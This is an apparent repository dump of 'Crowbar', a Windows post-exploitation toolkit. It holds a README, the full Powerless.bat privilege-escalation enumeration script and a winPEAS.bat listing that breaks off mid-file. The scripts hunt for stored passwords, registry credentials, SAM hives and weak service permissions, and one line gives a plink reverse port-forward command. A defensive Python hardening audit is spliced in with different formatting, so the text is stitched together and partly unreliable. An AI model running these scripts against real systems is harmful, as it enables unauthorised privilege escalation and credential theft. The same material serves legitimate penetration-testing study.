```
├── README.md
├── escalate
│   ├── Powerless.bat
│   ├── winPEAS.bat
│   └── winprivesc.bat
├── main.py
├── requirements.bat
├── scripts
│   ├── getunconstrained.ps1
│   ├── iisconfig.ps1
│   ├── list_antivirus.bat
│   ├── listarptables.ps1
│   ├── listcredentials.ps1
│   ├── listnetworkinter.ps1
│   ├── listprogramsfol.ps1
│   ├── listprogramsreg.ps1
│   ├── removeupdate.ps1
│   ├── routingtable.ps1
│   ├── sensitive_data_search.ps1
│   └── unquoteservice.ps1
└── util
    ├── AvTrigger
    │   ├── main.go
    │   └── video.mov
    ├── VM-Detect
    │   ├── example.cpp
    │   └── vmdetect.h
    ├── disable_firewall.ps1
    ├── get_powershell_history.ps1
    ├── list_firewall_blocked_ports.ps1
    └── screencapture.py
```

/README.md:
--------------------------------------------------------------------------------
# Crowbar - A windows post exploitation tool
![image](https://user-images.githubusercontent.com/78043996/115156390-0d8c6800-a052-11eb-9821-8cfd1f765114.png)
# Status - ✔️
This project is now considered finished. Any updates from now on will most likely be new scripts/utilities or just bug fixes. I will try to update/add anything I can to improve this project as frequently as possible. More coming soon!
# Update logs
[4/25/21] - Added 2 new scripts and 5 utilities. Added a new option in the main menu called 'WSL' which checks to see if the target machine has 'Windows Subsystem for Linux' installed.

[4/24/21] - Added new scripts and fixed minor issues. Added an extra utility.

[4/18/21] - Added a new directory called 'Escalate' to aid in the process of privilege escalation, added 3 more scripts, added a new feature for the 'Scripts' directory called 'Hail Mary' which launches all of the scripts against the target machine, removed 1 broken utility, and fixed minor bugs. More stuff coming out soon.

[4/15/21] - Added a new tool called 'iPower' for executing system commands via PowerShell. Fixed minor bugs, added a powershell script execution bypass, and fixed up the powershell modules. More scripts and utilities coming soon.

[4/15/21] - Crowbar V2! The whole framework was completely recoded and re-designed. I have added 30 scripts and 1 extra utility.

[4/15/21] - Whole rework coming soon.

[4/14/21] - Added 'iMonitor' menu. Fixed some minor menu issues. Added 6 scripts and 2 extra utilities.

[4/13/21] - Added 'Connect Hub' menu. Fixed minor issues.
# Installation
[Make sure you have CMD open in the Crowbar folder]

[And yes, to execute the .bat file just put the name and the extension.]
```
requirements.bat
python main.py
```
# Screenshots
![image](https://user-images.githubusercontent.com/78043996/116015292-a9941180-a606-11eb-9881-875cb6318b45.png)
![image](https://user-images.githubusercontent.com/78043996/116015306-b9abf100-a606-11eb-9fe4-d26655dfc07a.png)
![image](https://user-images.githubusercontent.com/78043996/116015314-c6c8e000-a606-11eb-8dff-e023cf52ccf0.png)
![image](https://user-images.githubusercontent.com/78043996/116015356-e8c26280-a606-11eb-9479-037b572b4b2d.png)
![image](https://user-images.githubusercontent.com/78043996/116015372-fb3c9c00-a606-11eb-9c1b-bcdb2aaa006f.png)
--------------------------------------------------------------------------------
/escalate/Powerless.bat:
--------------------------------------------------------------------------------
```bat
@echo off
set userprofile=%cd%
mode con:cols=160 lines=9999
Cd c:\

echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
:: https://github.com/GDSSecurity/Windows-Exploit-Suggester
systeminfo
echo.

echo ----- Architecture -------
SET Processor
echo.

echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
:: Note, in CTF boxes it's not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that user's rights, pay close attention to their user folder.
echo Current User: %username%
whoami /all
echo --- All users, accounts and groups ---
net users
net accounts
net localgroup

echo ------- Administrators --------
net localgroup administrators

echo ------- Environment Variables -------
set
echo.

echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)--------
for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
echo.

echo ---------------------------------------- Search for Quick Wins --------------------------------------
echo -------- Listing contents of user directories ---------
:: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention to files that may contain credentials, or files that may be used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script).
dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
echo.

echo -------- Exploring program directories and C:\ ---------
:: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds.
echo --- Program Files ---
dir "C:\Program Files" /b
echo --- Program Files (x86) ---
dir "C:\Program Files (x86)" /b
echo --- Root of C:\ ----
dir "C:\" /b
echo.

echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) ---
:: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script, but it should always be investigated regardless.
dir /a /b C:\inetpub\

echo --- Broad search for Apache or Xampp ---
dir /s /b apache* xampp*
echo.

echo ---Search for Configuration and sensitive files---
echo -- Broad search for config files --
:: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more you'll learn which files can be ignored, and which you should give a closer eye to.
dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
echo -- Application Host File --
type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
echo -- Broad search for unattend or sysprep files --
dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
echo -- Stored Passwords --
:: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9")
cmdkey /list
echo.

echo -- Checking for any accessible SAM or SYSTEM files --
dir %SYSTEMROOT%\repair\SAM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
dir %SYSTEMROOT%\System32\config\SAM 2>nul
dir %SYSTEMROOT%\repair\system 2>nul
dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
dir /a /b /s SAM.b*
echo.

echo -- Broad search for vnc kdbx or rdp files --
dir /a /s /b *.kdbx *vnc.ini *.rdp
echo.

echo --- Searching Registry for Passwords ---
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query HKLM /f password /t REG_SZ /s /k
reg query HKCU /f password /t REG_SZ /s /k
reg query "HKCU\Software\ORL\WinVNC3\Password"
:: Key name corrected from "Current\ControlSet" (a typo that made the query always fail)
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
echo.

echo --- AlwaysInstallElevated Check ---
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
echo.

echo --- Program Files and User Directories where everybody (or users) have full or modify permissions ---
where /q icacls
IF ERRORLEVEL 1 (
    echo icacls is missing, performing checks using cacls for older versions of Windows
    FOR /F "tokens=* USEBACKQ" %%F IN (`where cacls`) DO (SET cacls_exe=%%F)
) ELSE (
    FOR /F "tokens=* USEBACKQ" %%F IN (`where icacls`) DO (SET cacls_exe=%%F)
)
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.

echo ---Domain joined? If so check domain controller for GPP files ----
set user
echo.

cd %userprofile%
echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) ---
REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
sc query state= all > scoutput.txt
findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
find /v """" path.txt > unquotedpaths.txt
sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
del /f Servicenames.txt
del /f services.txt
del /f path.txt
del /f scoutput.txt
del /f unquotedpaths.txt
echo.

echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------
reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f

echo --- Accesschk World writeable folders and files ----
accesschk.exe -uwdqs "Users" c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula
accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
echo.
echo --- Accesschk services with weak permissions ---
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
echo.
echo --- Accesschk services that we can change registry values for (such as ImagePath) ---
accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
echo.
echo ---------------------------------------- End Search for Quick Wins --------------------------------------

cd c:\
echo ------- Powershell existence/version check -------
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion

echo ------- Network shares -------
net share

echo ------- Programs that run at startup ------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
wmic startup get caption,command

echo -------- Path (is dll hijacking possible?) ------
echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])...
echo %path%
echo.
:: I couldn't find a way to only get the system path in DOS (the user path does not matter for the purpose of dll hijacking). If powershell is available you can use the folderperm.ps1 script
:: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1
:: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)"
:: Or let the script do all the work for you
:: powershell.exe -executionpolicy bypass -file folderperm.ps1

echo ------- Scheduled Tasks Names Only -------
:: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it.
schtasks /query /fo LIST 2>nul | findstr "TaskName"
echo.

echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) -------
schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
echo.

echo ------- Services Currently Running (check for Windows Defender or Anti-virus) ---------
net start
echo.

echo ------- Link Running Processes to started services --------
tasklist /SVC
echo.

echo ------- Processes verbose output (who is running what?) --------
:: Pay close attention to this list. Especially for those tasks run by a user other than your own.
tasklist /v
echo.

echo ------- Patches (also listed as part of systeminfo) -------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
:: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case it's important to have this fallback.
wmic qfe get Caption,Description,HotFixID,InstalledOn

echo ------- Firewall ------
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall dump

echo ------ Network information ------
ipconfig /all

:: Routing and ARP tables accessible with these commands... uncomment if you wish, I didn't typically find them helpful for priv esc.
REM route print
REM arp -A
echo.

echo ------- Current connections and listening ports -------
:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?
netstat -ano
echo.
echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------
echo.

echo --- Broad search for any possible config files which may contain passwords ---
:: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db).
dir /s /b *pass* *cred* *vnc* *.config*
echo.

echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --
start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
echo.
```
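The two misconfigurations Powerless.bat spends the most lines on, unquoted service binary paths (the `sc qc` / `find /v """"` pipeline) and program directories where Everyone or BUILTIN\Users hold Full or Modify (the `icacls` loop), are the same things a hardening review has to find. The Python below is an added example, not part of Crowbar or Powerless: it parses constructed sample output in the shape those two commands produce and reports what should be fixed. The service names, paths and ACL lines are made up for the example; on a real host, feed the functions the captured output of `sc qc` and `icacls` instead. The `C:\Windows` exclusion mirrors the script's `findstr /i /v C:\WINDOWS`.

```python
"""Hardening audit over `sc qc` and `icacls` output (added example)."""
import re

# Constructed sample of concatenated `sc qc <service>` output (three services).
SAMPLE_SC_QC = r"""
SERVICE_NAME: GoodSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : "C:\Program Files\Good Vendor\svc.exe" --run
        DISPLAY_NAME       : Good Service

SERVICE_NAME: BadSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\Program Files\Bad Vendor\Sub Dir\agent.exe -service
        DISPLAY_NAME       : Bad Service

SERVICE_NAME: SysSvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        DISPLAY_NAME       : System Service
"""

# Constructed sample of `icacls "C:\Program Files\*"` output (continuation
# lines are indented and belong to the path on the preceding unindented line).
SAMPLE_ICACLS = r"""
C:\Program Files\Bad Vendor NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                            BUILTIN\Administrators:(OI)(CI)(F)
                            BUILTIN\Users:(OI)(CI)(M)
C:\Program Files\Good Vendor NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                             BUILTIN\Users:(OI)(CI)(RX)
"""


def parse_sc_qc(text):
    """Map SERVICE_NAME -> BINARY_PATH_NAME from concatenated `sc qc` output."""
    services, name = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"SERVICE_NAME:\s*(\S+)", line)
        if m:
            name = m.group(1)
            continue
        m = re.match(r"BINARY_PATH_NAME\s*:\s*(.+)$", line)
        if m and name:
            services[name] = m.group(1).strip()
    return services


def executable_of(binary_path):
    """Executable portion of an unquoted service command line (up to the first .exe)."""
    m = re.match(r"(.+?\.exe)", binary_path, re.IGNORECASE)
    return m.group(1) if m else binary_path.split(" ")[0]


def find_unquoted_service_paths(text, ignore_prefix="C:\\Windows"):
    """(service, executable) pairs whose path is unquoted, contains spaces and
    lies outside ignore_prefix; these need quoting via `sc config ... binPath=`."""
    findings = []
    for name, path in sorted(parse_sc_qc(text).items()):
        if path.startswith('"') or path.lower().startswith(ignore_prefix.lower()):
            continue
        exe = executable_of(path)
        if " " in exe:
            findings.append((name, exe))
    return findings


# One ACE as icacls prints it: principal, colon, one or more (RIGHT) groups at end of line.
ACE_RE = re.compile(
    r"(?:^|\s)(?P<principal>Everyone|CREATOR OWNER"
    r"|NT AUTHORITY\\[^:\s]+(?: [^:\s]+)*"
    r"|BUILTIN\\[^:\s]+(?: [^:\s]+)*"
    r"|NT SERVICE\\[^:\s]+"
    r"|[^\s:\\]+\\[^\s:]+|[^\s:\\]+)"
    r":(?P<perms>(?:\([A-Z,]+\))+)\s*$")
WEAK_PRINCIPALS = {"everyone", "builtin\\users", "nt authority\\authenticated users"}
WEAK_RIGHTS = {"F", "M", "W"}  # Full, Modify, Write


def parse_icacls(text):
    """Yield (path, principal, rights) from icacls output, carrying the path
    across the indented continuation lines."""
    path = None
    for line in text.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue
        if re.match(r"[A-Za-z]:\\", line):      # unindented line: path precedes the ACE
            path = line[:m.start()].rstrip()
        if path is None:
            continue
        rights = set(re.findall(r"\(([A-Z,]+)\)", m.group("perms")))
        yield path, m.group("principal"), rights


def find_weak_acls(text):
    """Directories where Everyone / Users / Authenticated Users hold F, M or W."""
    return sorted({(p, who) for p, who, rights in parse_icacls(text)
                   if who.lower() in WEAK_PRINCIPALS and rights & WEAK_RIGHTS})


if __name__ == "__main__":
    for svc, exe in find_unquoted_service_paths(SAMPLE_SC_QC):
        print(f"[unquoted path] {svc}: {exe}")
    for path, who in find_weak_acls(SAMPLE_ICACLS):
        print(f"[weak ACL] {who} can modify {path}")
```

On the sample data the audit reports BadSvc (its path is unquoted and every directory along it contains a space) and the Bad Vendor directory where BUILTIN\Users hold Modify; the remediation for the first is to quote the path with `sc config BadSvc binPath= "\"C:\Program Files\Bad Vendor\Sub Dir\agent.exe\" -service"`, and for the second to remove the Modify grant with icacls. The `ACE_RE` pattern lists the well-known principals that contain spaces explicitly because icacls output does not otherwise delimit path from principal.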
247 | -------------------------------------------------------------------------------- /escalate/winPEAS.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF & SETLOCAL EnableDelayedExpansion 2 | TITLE WinPEAS - Windows local Privilege Escalation Awesome Script 3 | COLOR 0F 4 | CALL :SetOnce 5 | 6 | REM :: WinPEAS - Windows local Privilege Escalation Awesome Script 7 | REM :: Code by carlospolop; Re-Write by ThisLimn0 8 | 9 | REM Registry scan of other drives besides 10 | REM /////true or false 11 | SET long=false 12 | 13 | :Splash 14 | ECHO. 15 | CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m" 16 | CALL :ColorLine " %E%32m,/*,..*(((((((((((((((((((((((((((((((((,%E%97m" 17 | CALL :ColorLine " %E%32m,*/((((((((((((((((((/, %E%92m.*//((//**,%E%32m .*((((((*%E%97m" 18 | CALL :ColorLine " %E%32m((((((((((((((((* %E%94m*****%E%32m,,,/########## %E%32m.(* ,((((((%E%97m" 19 | CALL :ColorLine " %E%32m(((((((((((/* %E%94m******************%E%32m/####### %E%32m.(. ((((((%E%97m" 20 | CALL :ColorLine " %E%32m((((((.%E%92m.%E%94m******************%E%97m/@@@@@/%E%94m***%E%92m/######%E%32m /((((((%E%97m" 21 | CALL :ColorLine " %E%32m,,.%E%92m.%E%94m**********************%E%97m@@@@@@@@@@(%E%94m***%E%92m,####%E%32m ../(((((%E%97m" 22 | CALL :ColorLine " %E%32m, ,%E%92m%E%94m**********************%E%97m#@@@@@#@@@@%E%94m*********%E%92m##%E%32m((/ /((((%E%97m" 23 | CALL :ColorLine " %E%32m..((%E%92m(##########%E%94m*********%E%97m/#@@@@@@@@@/%E%94m*************%E%32m,,..((((%E%97m" 24 | CALL :ColorLine " %E%32m.((%E%92m(################(/%E%94m******%E%97m/@@@@@#%E%94m****************%E%32m.. 
/((%E%97m" 25 | CALL :ColorLine " %E%32m.(%E%92m(########################(/%E%94m************************%E%32m..*(%E%97m" 26 | CALL :ColorLine " %E%32m.(%E%92m(#############################(/%E%94m********************%E%32m.,(%E%97m" 27 | CALL :ColorLine " %E%32m.(%E%92m(##################################(/%E%94m***************%E%32m..(%E%97m" 28 | CALL :ColorLine " %E%32m.(%E%92m(######################################(%E%94m************%E%32m..(%E%97m" 29 | CALL :ColorLine " %E%32m.(%E%92m(######(,.***.,(###################(..***(/%E%94m*********%E%32m..(%E%97m" 30 | CALL :ColorLine " %E%32m.(%E%92m(######*(#####((##################((######/(%E%94m********%E%32m..(%E%97m" 31 | CALL :ColorLine " %E%32m.(%E%92m(##################(/**********(################(%E%94m**%E%32m...(%E%97m" 32 | CALL :ColorLine " %E%32m.((%E%92m(####################/*******(###################%E%32m.((((%E%97m" 33 | CALL :ColorLine " %E%32m.((((%E%92m(############################################/%E%32m /((%E%97m" 34 | CALL :ColorLine " %E%32m..((((%E%92m(#########################################(%E%32m..(((((.%E%97m" 35 | CALL :ColorLine " %E%32m....((((%E%92m(#####################################(%E%32m .((((((.%E%97m" 36 | CALL :ColorLine " %E%32m......((((%E%92m(#################################(%E%32m .(((((((.%E%97m" 37 | CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m../(((((((((.%E%97m" 38 | CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" 39 | CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" 40 | CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" 41 | ECHO. by carlospolop 42 | ECHO. 43 | ECHO. 
44 | 45 | :Advisory 46 | REM // Increase progress in title by n percent 47 | CALL :T_Progress 0 48 | ECHO./^^!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script 49 | CALL :ColorLine " %E%41mWinPEAS should be used for authorized penetration testing and/or educational purposes only.%E%40;97m" 50 | CALL :ColorLine " %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m" 51 | CALL :ColorLine " %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m" 52 | ECHO. 53 | 54 | :SystemInfo 55 | CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO 56 | CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" 57 | ECHO. [i] Check for vulnerabilities for the OS version with the applied patches 58 | ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits 59 | systeminfo 60 | ECHO. 61 | CALL :T_Progress 2 62 | 63 | :ListHotFixes 64 | wmic qfe get Caption,Description,HotFixID,InstalledOn | more 65 | set expl=no 66 | for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) 67 | IF "%expl%" == "yes" ECHO. [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) 68 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL 69 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) 70 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL 71 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! 
(Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) 72 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL 73 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) 74 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL 75 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) 76 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL 77 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) 78 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL 79 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) 80 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL 81 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) 82 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL 83 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) 84 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL 85 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) 86 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL 87 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! 
(Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) 88 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL 89 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) 90 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL 91 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) 92 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL 93 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) 94 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL 95 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) 96 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL 97 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) 98 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL 99 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) 100 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL 101 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) 102 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL 103 | IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! 
